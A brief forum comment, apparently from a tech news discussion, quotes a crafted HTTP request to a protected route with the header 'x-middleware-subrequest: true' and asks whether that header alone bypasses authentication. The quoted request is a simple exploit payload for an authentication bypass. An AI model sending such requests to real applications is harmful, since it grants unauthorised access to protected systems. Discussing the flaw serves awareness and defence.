|
|
|
|
|
by ronbenton
449 days ago
|
|
Oh my word: The exploit involves crafting HTTP requests containing the malicious header: GET /protected-route HTTP/1.1
Host: vulnerable-app.com
x-middleware-subrequest: true So... just adding a "x-middleware-subrequest: true" header bypasses auth? Am I understanding this correctly? |
|